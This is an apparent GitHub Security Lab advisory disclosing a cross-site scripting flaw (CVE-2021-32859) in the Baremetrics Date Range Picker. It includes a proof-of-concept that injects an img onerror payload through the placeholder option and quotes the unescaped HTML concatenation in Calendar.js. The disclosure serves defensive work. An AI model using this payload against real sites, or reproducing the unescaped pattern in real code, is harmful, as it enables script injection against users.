GHSL-2021-1042: XSS in Baremetrics - CVE-2021-32859

Coordinated Disclosure Timeline

• 2021-11-24: Maintainer contacted
• 2022-05-12: Public issue requesting a security contact created
• 2022-05-12: Project is no longer maintained

Summary

Baremetrics Date Range Picker is prone to Cross-site scripting (XSS) when handling untrusted placeholder entries.

Product

Baremetrics Date Range Picker

Tested Version

v1.0.14

Details

Issue 1: XSS in placeholder (GHSL-2021-1042)

An attacker who is able to influence the field placeholder when creating a Calendar instance is able to supply arbitrary html or javascript that will be rendered in the context of a user leading to XSS.

Proof of concept snippet:

var ss = new Calendar({
  element: $('.daterange--single'),
  format: {input: 'YYYY'},
  placeholder: 'Foobar"> <img src="foobar" onerror="alert(3)" /><',
  required: false,
  callback: function() {
    console.log('Single calendar callback triggered');
  }
});

Vulnerable code: Calendar.js

    return this.element.append('<div class="dr-input">' +
      '<div class="dr-dates">' +
        '<div class="dr-date" contenteditable placeholder="'+ this.placeholder +'">'+ (this.settings.current_date ? moment(this.current_date).format(this.format.input) : '') +'</div>' +
      '</div>' +

Impact

This issue may lead to XSS

Resources

• Proof of concept

CVE

• CVE-2021-32859

Resources

• GitHub issue

Credit

This issue was discovered by GitHub team member @erik-krogh (Erik Krogh Kristensen).

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2021-1042 in any communication regarding this issue.